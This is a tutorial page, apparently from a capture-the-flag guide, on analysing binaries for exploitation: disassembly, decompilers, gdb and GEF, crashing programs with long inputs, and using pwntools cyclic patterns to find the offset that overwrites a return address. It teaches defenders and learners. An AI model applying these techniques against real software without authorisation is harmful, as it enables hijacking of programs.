Reverse Engineering for Pwn

Understand the binary and find vulnerabilities by analyzing it

Binary Exploitation always first starts with understanding the binary. This can be done in two ways, static analysis and/or dynamic analysis. In static analysis, you are looking at the code of the binary itself, and not yet executing it. With dynamic analysis, you are not looking at the code but running the binary and trying inputs yourself that might do something interesting. Often the best choice is a combination of both.

Static analysis

For really simple programs, you might get away with just dumping the assembly code and looking through it:

$ objdump -d ./binary
...
0000000000401405 <main>:
  401405:       55                      push   %rbp
  401406:       48 89 e5                mov    %rsp,%rbp
  401409:       48 83 ec 30             sub    $0x30,%rsp
  40140d:       e8 9c ff ff ff          call   4013ae <setup>
  401412:       e8 64 ff ff ff          call   40137b <banner>
  401417:       48 c7 45 d0 00 00 00    movq   $0x0,-0x30(%rbp)
...

However, this is very low-level code and makes it hard to see the big picture. That is why we use decompilers to try and guess what the original source code might have looked like. Common ones include IDA or Ghidra.

When looking at that C code, you can look at what steps the code takes and especially where your user input goes. It may be written to a buffer with a smaller size than the input allows, which can overflow it. When you find such a case you can switch over to Dynamic analysis to test your ideas.

A good thing to know before jumping straight into dynamic analysis on a compiled binary is that if you have the C source code, you can add debug symbols for yourself with the -g argument:

$ gcc -ggdb main.c -o main
$ gdb ./main

This will not only show the source code while debugging but also local variables and structs. Using commands like p [variable] you can print local variables in their fancy representation, for structs this means including the names of attributes.

Example
     14  int main()
     15  {
     16      struct example var = {66, "Hello"};
    17      print(ex);
     18      return 0;
     19  }
─────────────────────────────────────────────────────────────────────────────────────
gef➤  p var
$1 = {
  id = 0x42,
  name = 0x55555555600b "Hello"
}

Dynamic analysis

Dynamic analysis is running the program and testing things. In the case of a buffer overflow, your input is bigger than the buffer it is being put into. While you can try to find this through Static analysis, in most cases it is easiest to just test it with a large input to see if the program crashes. For example:

Python
>>> "A"*200
'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'

Programs often have input in the form of STDIN (Standard Input, typing after the program is started), or from command-line arguments. In some cases, it may also read files, connect to sockets, or more. When you find any sort of input it is a good idea to try putting a large string in there just to be sure. For simpler binary exploitation challenges this will almost always find you the vulnerability quickly:

$ ./binary
Input: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Segmentation fault

When you see this Segmentation fault message it is a clear sign of something in the program corrupting causing it to panic. To view the error in more detail you can look at the dmesg command which will generate a few logs on such a fault.

From here, you'll often want to find the exact offset for your payload to know what will be overwritten. This is often done using a de Bruijn sequence, also known as a cyclic pattern. This is a string of text that never repeats itself, so if you find some substring of it in an error for example you can easily find what part of the string that substring was. As opposed to if you just saw "AAAA" and don't know what part of the 200 A's it came from.

A pattern like this can easily be generated using pwntools:

$ cyclic 200
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab
# # Also supports looking up the offset for a substring:
$ cyclic -l oaaa
56

Buffer overflows are about controlling the Instruction Pointer, and when a crash happens this is often because of a ret (return) instruction which pops an address from the stack, and jumps to it. If you have overflowed the stack in this way, you might have overflown this return address, and it will try to jump to the address your text represents. This address can be found easily using GDB GEF. You can run the binary, and then when it crashes you will get a lot more information:

$ gdb ./binary
GNU gdb (Ubuntu 9.2-0ubuntu1~20.04.1) 9.2

GEF for linux ready, type 'gef' to start, 'gef config' to configure
90 commands loaded and 5 functions added for GDB 9.2 in 0.00ms using Python engine 3.8
gef➤ run
Starting program: ./binary

Input: aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab

Program received signal SIGSEGV, Segmentation fault.
0x0000000000401602 in main ()
...
───────────────────────────────────────────────────────────────────────── stack ────
0x007fffffffd708│+0x0000: "oaaapaaaqaa"  ← $rsp
0x007fffffffd710│+0x0008: 0x00000000616171 ("qaa"?)
0x007fffffffd718│+0x0010: 0x00000000401405  →  <main+0> push rbp
...
─────────────────────────────────────────────────────────────────── code:x86:64 ────
     0x401601 <main+508>       leave
 →   0x401602 <main+509>       ret
[!] Cannot disassemble from $PC
──────────────────────────────────────────────────────-──────────-───── threads ────
[#0] Id 1, Name: "labyrinth", stopped 0x401602 in main (), reason: SIGSEGV
───────────────────────────────────────────────────────────────────────── trace ────
gef➤ x $rsp
0x7fffffffd708: 0x6161616f

This x $rsp command examines the value at the Stack Pointer register. The ret instruction that it crashes at will take the first value from there, and jump to it. In this example the value was 0x6161616f, which we can look up with the cyclic tool:

$ cyclic -l 0x6161616f
56

Now we know that we need to provide 56 A's to overflow the buffer, and then the following bytes become the instruction pointer. Finding this offset is something you will have to do for almost every buffer overflow you find, so it is good to get used to.

Input from file

In GDB, you don't have to type all your input yourself. Similarly to bash, you can redirect input from a file into your binary. This can also be really useful for inputting special characters while testing your payload.

gef➤ run < /path/to/file

Last updated